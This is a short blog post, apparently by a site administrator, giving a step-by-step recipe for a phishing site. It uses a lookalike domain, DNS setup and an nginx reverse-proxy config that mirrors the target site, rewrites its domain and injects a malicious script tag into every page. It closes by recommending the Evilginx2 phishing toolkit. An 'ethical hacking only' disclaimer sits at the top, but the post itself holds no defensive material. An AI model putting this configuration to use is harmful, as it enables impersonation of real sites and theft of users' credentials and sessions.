How to create the perfect phishing site

2019-05-11

This guide is for ethical hacking purposes only! Don’t use it for malicious stuff.

Phishing is the most common and easiest way, to steal user data. As an administrator it is my job to secure our sites against different kinds of attacks. Unfortunately there is no technical way right now, to protect the users against phishing sites.

In this blog post, I demonstrate the easiest way to create a perfect phishing site. In a succeeding blog post, I will discuss possible counter methods.

Approach 1 - Copy The Site

This is the most common approach. Most “How to” recommend this approach for creating a phishing site. In my opinion, this is not a very elegant way of doing it. It is the more effortful approach and the results is most often far away from perfect. Well most times this is enough for the common phishing site. But I would prefer another approach for a targeted attack.

Approach 2 - Reverse Proxy

There’s a much easier approach. By setting up a reverse proxy, you do not have to copy the site. You just forward any requests to the faked site and manipulate the response. But how does that work? The following guide is not complete. It does not include methods for bypassing any countermeasures.

Step 1 - Setup A Small Server

Setup a small root server. E.g. you could use a 5$ Digitalocean droplet. In this tutorial I use Debian/Ubuntu. The command will be different on other distributions.

Step 2 - Setup A Domain

Find a domain, that is as close to the target domain as possible. If the target domain is "next-gen-company.com", check whether "next-gen-company-ag.com" is available. If your domain is close to the original domain, your phishing site is more successful.

Step 3 - Configure Your DNS Zone

Setup the A record for "next-gen-company-ag.com" and point it to your server.

Step 4 - Install nginx

Install the web server nginx. On Debian/Ubuntu you can do this, by typing:

sudo apt-get install nginx

Step 5 - Configure nginx

Put the following code into the file /etc/nginx/sites-available/default:


server {
    listen 80 default_server;
    listen [::]:80 default_server;

    location / {
        proxy_pass https://next-gen-company.com;
        sub_filter next-gen-company.com next-gen-company-ag.com;
        sub_filter "</head>" "<script src='https://url.com/your-malicious-script.js'></script></head>";
        proxy_set_header Accept-Encoding "";
        sub_filter_once off;
    }        
}
    

Step 6 - Reload Server

Check the configuration with

nginx -t

If the configuration is ok run

service nginx reload

Thats it

That was simple! Wasn’t it? Just open next-gen-company-ag.com and watch the result.

There may be some more modification to do, but I think you got the point.

EvilNginx2

If you are looking for a ready to use solution for penetration testing checkout https://github.com/kgretzky/evilginx2

Back to Posts